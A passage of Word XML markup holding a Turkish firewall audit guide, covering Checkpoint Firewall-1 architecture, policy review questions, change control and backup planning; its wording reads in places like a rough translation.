        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F605EB">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>İnternet erişim gereksinimleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F605EB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F605EB">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>İnternet / extranet erişimi için iş gerekçelerini anlama</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F605EB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5160"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F605EB">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>İzin verilen gelen ve giden hizmetlerin doğrulanması</w:t>
      </w:r>
      <w:r w:rsidRPr="00F605EB">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F605EB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5160"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F605EB">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Güvenlik duvarı tasarımını gözden geçirme (yani, çift yönlü, çok yönlü, proxy)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F605EB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5160"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F605EB">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>İç / dış ağlara bağlantıyı analiz etme:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5160"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F605EB">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Çevre ağı ve dış bağlantılar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5160"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F605EB">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Elektronik ticaret ağ geçitleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5160"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F605EB">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Şirketler arası veya şirket içi LAN-WAN bağlantısı</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5160"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F605EB">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Genel kurumsal güvenlik mimarisi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F605EB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5160"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F605EB">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Belirli bir sitedeki veya konumdaki tüm bilgisayar kurulumu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F605EB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5160"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F605EB">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ağ ve güvenlik duvarı yöneticileriyle görüşme</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5160"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F605EB">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bilgi güvenliği mimarisinde şirket politikasının ne olduğunu yansıtmayan bir hata varsa, güvenlik duvarı bu eksikliğin yerini a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lamaz.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5160"/>
        </w:tabs>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F605EB">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Güvenlik duvarı açısından, ölçeklenebilir ve dağıtılabilir bir güvenlik duvarı sistemi elde etmek için Checkpoint, Firewall-1 ürününün işlevselliğini iki bileşene ayırmıştır: bir Güvenlik Duvarı Modülü </w:t>
      </w:r>
      <w:r w:rsidRPr="00F605EB">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ve bir Yönetim Modülü. Bu bileşenlerin etkileşimi, standart Checkpoint Firewall mimarisinin tamamını oluşturur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F605EB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5160"/>
        </w:tabs>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F605EB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5160"/>
        </w:tabs>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F605EB">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Yönetim modülü, diğer güvenlik duvarı modülleri için m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">erkezi bir kontrol cihazıdır ve </w:t>
      </w:r>
      <w:r w:rsidRPr="00F605EB">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Güvenlik duvarı işlevselliğini tanımlayan nesneler ve kurallar mevcuttur. Kurallar ve nesneler, güvenlik duvarı modüllerinden birine veya tümüne uygulanabilir. Diğer güvenlik duvarı modülleri tarafından oluşturulan tüm günlükler ve uyarılar buna gönderilir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F605EB">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>depolama, sorgulama ve inceleme için yönetim sistemi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5160"/>
        </w:tabs>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F605EB">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Güvenlik duvarı modülünün kendisi, ayrı bölgeler arasındaki tüm trafiğin geçmesi gereken gerçek ağ geçidi sistemidir. Güvenlik duvarı modülü, paketleri inceleyen, kuralları uygulayan ve günlükleri ve uyarıları üreten sistemdir. Kural tabanı ve günlük depolaması için bir veya daha fazla yönetim modülüne güvenir, ancak yönetim modülü çalışmıyorsa mevcut kural tabanı ile bağımsız olarak çalışmaya devam edebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F605EB">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Güvenlik duvarı mimarileri tasarımında kulla</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">nmak için mükemmel bir referans </w:t>
      </w:r>
      <w:r w:rsidRPr="00F605EB">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>İnt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ernet Güvenlik Duvarı Oluşturma </w:t>
      </w:r>
      <w:r w:rsidRPr="00F605EB">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Elizabeth Zwicky (O'Reilly ve Doç. ISBN: 1565928717).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F605EB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F605EB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F605EB">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Adım 2: Kurumsal Bilgi Sistemi Güvenlik Politikalarını Gözden Geçirin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F605EB">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Politika, bir güvenlik duvarının etkin ve başarılı bir şekilde çalışmasının kritik bir unsurudur. Güvenlik duvarı, kullanımı ve yönetimi yöneten çalışma politikaları bağlamında konuşlandırmadıkça etkili olamaz.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F605EB">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Marcus Ranum bir güvenlik duvarını “İnternet güvenlik politikanızın uygulaması” olarak tanımlar. Bir güvenlik politikanız yoksa, bir güvenlik duvarınız yoktur. Bunun yerine, bir şeyler yapan bir şeye sahipsiniz, ancak ne yapmaya çalıştığını bilmiyorsunuz çünkü kimse size ne yapması gerektiğini söylemedi. ”Bir kuruluşun anlamlı bir güvenlik duvarı incelemesi yapmasını beklediği takdirde. Bir dizi gü</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">venlik duvarı politikası yoksa, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F605EB">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>organizasyon kaba bir uyanış için içeride.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F605EB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00F605EB">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Güvenlik duvarı incelemesi sırasında sorulacak bazı politika temelli sorular şunlardır:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F605EB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F605EB">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kuruluş için yayınlanmış bir güvenlik duvarı politikası var mı?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F605EB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F605EB">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Üst yönetim, güvenlik duvarı altyapısıyla ilgili politikaları gözden geçirdi ve onayladı mı?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F605EB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F605EB">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kuruluşun bilgi güvenliğini kontrol etmekten kim sorumludur?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F605EB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F605EB">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Güvenlik duvarı politikalarını değiştirme prosedürleri var mı? Eğer öyleyse, süreç nedir?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F605EB">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bu politikalar kurum içinde nasıl iletilir?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F605EB">
        <w:t>Güvenlik duvarının yönetimi ile ilgili olarak ele alınması gereken sorunlardan bazıları şunlardır:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F605EB">
        <w:t>Güvenlik duvarlarına kim sahip ve bu tanımlanmış mı?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Her güvenlik duvarı için belirtilen politikaların uygulanmasından kim sorumludur?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Güvenlik duvarının günlük yönetiminden kim sorumludur?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F605EB">
        <w:t>Güvenlik duvarını belirtilen politikalara uygunluk açısından kim izler?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Güvenlikle ilgili olaylar uygun bilgi güvenliği personeline nasıl bildirilir?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F605EB">
        <w:t>Yeni güvenlik açıklarının varlığı için CERT, CIAC, satıcıya özel ve benzer öneriler izleniyor mu?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F605EB">
        <w:t>Muhafaza etme ve raporlama prosedürleri dahil olmak üzere farklı olaylara nasıl tepki vereceğinizi belirten yazılı prosedürler var mı?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Değişim kontrolü bir güvenlik duvarı için kritik derecede önemlidir. Bazı değişiklik kontrolleri sorunları:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6990"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Değişiklik kontrol prosedürü belgelerinin mevcut olduğundan emin olun.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6990"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Test planlarının gözden geçirildiğinden emin olun.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6990"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F605EB">
        <w:t>Düzeltmeleri güncelleme prosedürlerini gözden geçirin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6990"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Yönetim onay sürecini gözden geçirin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6990"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>İşlem, aşağıdaki bileşenlerde yapılan değişikliklerin belgelenmesini sağlamalıdır:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6990"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Herhangi bir yükseltme veya düzeltme eki, arıza süresinin bildirilmesini ve zamanlanmasını gerektirir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6990"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Tüm değişikliklerin elektronik kopyaları</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6990"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F605EB">
        <w:t>Basılı kopya formu tüm değişiklikler için dolduruldu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6990"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Son olarak, felaketler meydana geldiğinde yedekleme ve beklenmedik durum planlaması çok önemlidir. Bazı konular:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6990"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F70E44">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Güvenlik Duvarı-1'in altın kopyasını alın</w:t>
      </w:r>
      <w:r>
        <w:t>. Altın kopya, ana bilgisayar ağa bağlanmadan önce tam yedeklenir. Bu kopya kurtarma için ve güvenlik duvarının bir şekilde tehlikeye girmesi durumunda referans olarak kullanılabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6990"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F70E44">
        <w:rPr>
          <w:i/>
        </w:rPr>
